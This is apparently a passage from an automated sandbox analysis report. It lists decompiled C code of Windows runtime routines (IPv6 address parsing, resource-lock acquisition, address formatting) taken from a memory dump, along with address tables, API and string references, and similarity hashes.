							E028EDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02920CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02920CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E029206BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E029206BA(_t135, _t178) == 0 || E02920A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02920CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02920CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E029206BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E029206BA(_t124, _t142) == 0 || E02920A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02920b21
0x02920b24
0x02920b27
0x02920b2a
0x02920b2d
0x02920b30
0x02920b33
0x02920b36
0x02920b39
0x02920b3e
0x02920c65
0x02920c68
0x02920c6a
0x02920c6f
0x0294eb42
0x00000000
0x00000000
0x0294eb48
0x0294eb48
0x02920c75
0x02920c7a
0x0294eb54
0x00000000
0x00000000
0x00000000
0x0294eb5a
0x02920c80
0x02920c84
0x0294eb98
0x00000000
0x00000000
0x0294eba6
0x02920cb8
0x02920cba
0x02920cd3
0x02920cda
0x02920ce4
0x02920ce9
0x00000000
0x02920cec
0x02920c8c
0x0294eb63
0x00000000
0x00000000
0x0294eb70
0x0294eb75
0x0294eb7d
0x00000000
0x00000000
0x0294eb8c
0x00000000
0x0294eb8c
0x02920c96
0x00000000
0x00000000
0x02920ca2
0x02920cac
0x02920cb4
0x00000000
0x00000000
0x02920b44
0x02920b47
0x02920b49
0x00000000
0x00000000
0x02920b4f
0x02920b50
0x00000000
0x00000000
0x02920b56
0x02920b62
0x02920b7c
0x02920bac
0x02920a0f
0x0294eaaa
0x00000000
0x0294eac4
0x0294eac4
0x02920bd0
0x02920bd0
0x02920bd4
0x02920bd9
0x00000000
0x00000000
0x02920bdb
0x02920be0
0x0294eb0e
0x02920a1a
0x00000000
0x02920a1a
0x0294eb1a
0x0294eb1f
0x0294eb27
0x00000000
0x00000000
0x0294eb36
0x00000000
0x0294eb36
0x02920bea
0x00000000
0x00000000
0x02920bf6
0x02920c00
0x02920c03
0x02920c0b
0x00000000
0x02920c0b
0x0294eaaa
0x00000000
0x02920a15
0x02920bb6
0x00000000
0x02920bc6
0x02920bc6
0x02920bcb
0x02920c15
0x00000000
0x00000000
0x02920c1d
0x02920c20
0x02920c21
0x02920c24
0x02920c24
0x02920c26
0x00000000
0x02920c26
0x02920bcd
0x00000000
0x02920bcd
0x02920b89
0x02920b89
0x02920b90
0x00000000
0x00000000
0x02920b96
0x00000000
0x02920b96
0x02920a04
0x02920a04
0x02920b9a
0x02920b9a
0x02920b9b
0x02920b9f
0x00000000
0x00000000
0x00000000
0x02920ba5
0x02920ac7
0x02920aca
0x0294eacf
0x00000000
0x0294eade
0x0294eade
0x0294eae3
0x00000000
0x00000000
0x0294eaf3
0x0294eaf6
0x0294eaf7
0x0294eafe
0x0294eb01
0x00000000
0x0294eb01
0x0294eacf
0x02920ad0
0x02920ad4
0x00000000
0x00000000
0x02920ada
0x02920ae6
0x02920c34
0x00000000
0x02920c47
0x02920c49
0x02920c4a
0x02920c4e
0x02920c51
0x02920c54
0x02920c57
0x02920c5a
0x00000000
0x00000000
0x00000000
0x02920c60
0x02920afb
0x02920afe
0x02920b02
0x02920b05
0x02920b08
0x00000000
0x02920b08
0x02920ae6
0x02920b44
0x029209f8
0x029209f8
0x029209f9
0x00000000
0x00000000
0x0294eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02920BF6
__fassign.LIBCMT ref: 02920CA2

Strings

., xrefs: 02920A0C
:, xrefs: 02920AC7
:, xrefs: 02920BA9

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 5e3f8871fbb71e106dc634054b66c1d8c8360e089f25cc6a4819495cbcc716b2
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 5AA1A0B1D0022AEFDF24CF64C8447BEB7B9BF65308F24946AD842A7289D730964DCB51

Uniqueness

Uniqueness Score: -1.00%

Function 02920554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02920554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x029c01c0;
									_push(_t144);
									_push(0);
									_t51 = E028DF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02924FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02933F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0296217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02933F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02923915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x029c01c0;
												_push(_t138);
												_push(0);
												_t58 = E028DF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02924FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0296217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02933F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02923915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02905384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E028DF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02923915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E028DF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02923915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E028DF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02923915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02905329(_t110, _t138);
																_t69 = E029053A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0292055a
0x0292055d
0x02920563
0x02920566
0x029205d8
0x029205e2
0x029205e5
0x00000000
0x029205e7
0x029205e7
0x029205ea
0x029205f3
0x029205f3
0x02920568
0x02920568
0x02920568
0x02920569
0x02920569
0x02920569
0x0292056b
0x00000000
0x00000000
0x0294217f
0x02942183
0x0294225b
0x0294225f
0x02942189
0x0294218c
0x0294218f
0x02942194
0x02942199
0x0294219d
0x029421a0
0x029421a2
0x029421ce
0x029421ce
0x029421ce
0x029421d0
0x029421d6
0x029421de
0x029421e2
0x029421e8
0x029421e9
0x029421ec
0x029421f1
0x029421f6
0x00000000
0x00000000
0x029421f8
0x029421fb
0x02942206
0x0294220b
0x0294220c
0x02942217
0x02942226
0x0294222b
0x0294222c
0x0294222f
0x02942232
0x02942235
0x02942235
0x0294223a
0x0294223f
0x02942241
0x02942243
0x02942248
0x02942248
0x0294224d
0x0294224f
0x02942262
0x02942263
0x02942268
0x02942269
0x02942269
0x02942269
0x0294226d
0x00000000
0x00000000
0x02942276
0x02942279
0x0294227e
0x02942283
0x02942287
0x0294228a
0x0294228d
0x0294228f
0x029422bc
0x029422bc
0x029422bc
0x029422be
0x029422c4
0x029422cc
0x029422d0
0x029422d6
0x029422d7
0x029422da
0x029422df
0x029422e4
0x00000000
0x00000000
0x029422e6
0x029422e9
0x029422f4
0x029422f9
0x029422fa
0x02942305
0x02942314
0x02942319
0x0294231a
0x0294231d
0x02942320
0x02942323
0x02942323
0x02942328
0x0294232d
0x0294232f
0x02942331
0x02942336
0x02942336
0x0294233b
0x0294233d
0x02942350
0x02942351
0x02942356
0x02942359
0x02942359
0x0294235b
0x0294235d
0x02905367
0x0290536b
0x02905372
0x00000000
0x00000000
0x00000000
0x00000000
0x02942363
0x02942363
0x02942369
0x0294236a
0x0294236c
0x02942371
0x02942373
0x00000000
0x02942379
0x02942379
0x0294237a
0x0294237f
0x0294237f
0x02942385
0x02942386
0x02942389
0x0294238e
0x02942390
0x02905378
0x0290537c
0x02942396
0x02942396
0x02942397
0x0294239c
0x029423a2
0x029423a3
0x029423a6
0x029423ab
0x029423ad
0x00000000
0x029423b3
0x029423b3
0x029423b4
0x029423b9
0x029423ba
0x029423ba
0x029423bc
0x029423bf
0x00000000
0x00000000
0x02939153
0x02939158
0x0293915a
0x0293915e
0x02939160
0x00000000
0x02939166
0x02939166
0x02939171
0x02939176
0x02939176
0x00000000
0x02939160
0x029423c6
0x029423ce
0x029423d7
0x029423d7
0x029423ad
0x02942390
0x02942373
0x0294233f
0x0294233f
0x00000000
0x0294233f
0x02942291
0x02942291
0x02942293
0x02942295
0x0294229a
0x029422a1
0x029422a3
0x029422a7
0x029422a9
0x00000000
0x00000000
0x029422ab
0x029422ad
0x029422af
0x00000000
0x00000000
0x00000000
0x029422af
0x029422b1
0x029422b4
0x029422b4
0x029422b6
0x029053be
0x029053be
0x029053be
0x029053c0
0x00000000
0x00000000
0x029053cb
0x029053ce
0x029053d0
0x029053d4
0x029053d6
0x00000000
0x029053d8
0x029053e3
0x029053ea
0x029053ea
0x00000000
0x029053d6
0x00000000
0x00000000
0x00000000
0x00000000
0x029422b6
0x00000000
0x0294228f
0x02942349
0x0294234d
0x02942251
0x02942251
0x00000000
0x02942251
0x029421a4
0x029421a4
0x029421a6
0x029421a8
0x029421ac
0x029421b6
0x029421b8
0x029421bc
0x029421be
0x00000000
0x00000000
0x029421c0
0x029421c2
0x029421c4
0x00000000
0x00000000
0x00000000
0x029421c4
0x029421c6
0x029421c6
0x029421c8
0x00000000
0x00000000
0x00000000
0x00000000
0x029421c8
0x029421a2
0x00000000
0x02942183
0x0292057b
0x0292057d
0x02920581
0x02920583
0x02942178
0x00000000
0x02920589
0x0292058f
0x0292058f
0x02920583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02942206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 029422FC
RTL: Re-Waiting, xrefs: 0294223A, 02942328
RTL: Resource at %p, xrefs: 0294221D, 0294230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0294220E

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: a63f2f8db72cae4c15fe7e49fdb8fbcf2532e96c9418635943b753f619594fc2
Instruction ID: b30c24176529f8b773fd5a940744de66dce6e35a77b149d704efd33085078f6a
Opcode Fuzzy Hash: a63f2f8db72cae4c15fe7e49fdb8fbcf2532e96c9418635943b753f619594fc2
Instruction Fuzzy Hash: C1512735B402116BEB15CF19CC80FA633AEBFD8724F214269FD59DB284DA21E8418B94

Uniqueness

Uniqueness Score: -1.00%

Function 029214C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E029214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x29c2088; // 0x7758bff3
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02917707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E029213CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02917707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02917707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E028E2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E028EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x029214c0
0x029214cb
0x029214d2
0x029214d6
0x029214da
0x029214de
0x029214e3
0x0292157a
0x0292157a
0x029214f1
0x029214f3
0x0294ea0f
0x00000000
0x0294ea15
0x00000000
0x0294ea15
0x029214f9
0x029214f9
0x029214fe
0x02921504
0x0294ea1a
0x0294ea1f
0x0294ea21
0x0294ea22
0x0294ea27
0x0294ea2a
0x0294ea2a
0x02921515
0x02921517
0x0292156d
0x02921572
0x02921575
0x02921575
0x0292151e
0x0294ea50
0x0294ea55
0x0294ea58
0x0294ea58
0x0292152e
0x02921531
0x02921533
0x00000000
0x02921535
0x02921541
0x02921549
0x02921549
0x02921533
0x029214f3
0x02921559

APIs

___swprintf_l.LIBCMT ref: 0294EA22

Part of subcall function 029213CB: ___swprintf_l.LIBCMT ref: 0292146B
Part of subcall function 029213CB: ___swprintf_l.LIBCMT ref: 02921490

___swprintf_l.LIBCMT ref: 0292156D

Strings

]:%u, xrefs: 0294EA47
%%%u, xrefs: 02921564

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: fd2380e9add51c975cb272896fdef1ad132d304ff3edbc5f78f962f12ad38590
Instruction ID: 9fcec805e09f6fc1339e1c08139d5da8686088c6eabc4dc9a1a027568b3e2509
Opcode Fuzzy Hash: fd2380e9add51c975cb272896fdef1ad132d304ff3edbc5f78f962f12ad38590
Instruction Fuzzy Hash: 7121C176900229ABDF21DE58CC40EEEB3ADBF50714F444552FC4AD3245DB70AA6D8BE1

Uniqueness

Uniqueness Score: -1.00%

Function 029053A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E029053A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x029c01c0;
									_push(_t92);
									_push(0);
									_t37 = E028DF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02924FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02933F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0296217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02933F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02923915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02905384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E028DF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02923915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E028DF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02923915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E028DF970( *((intOrPtr*)(_t92 + 0x20)));
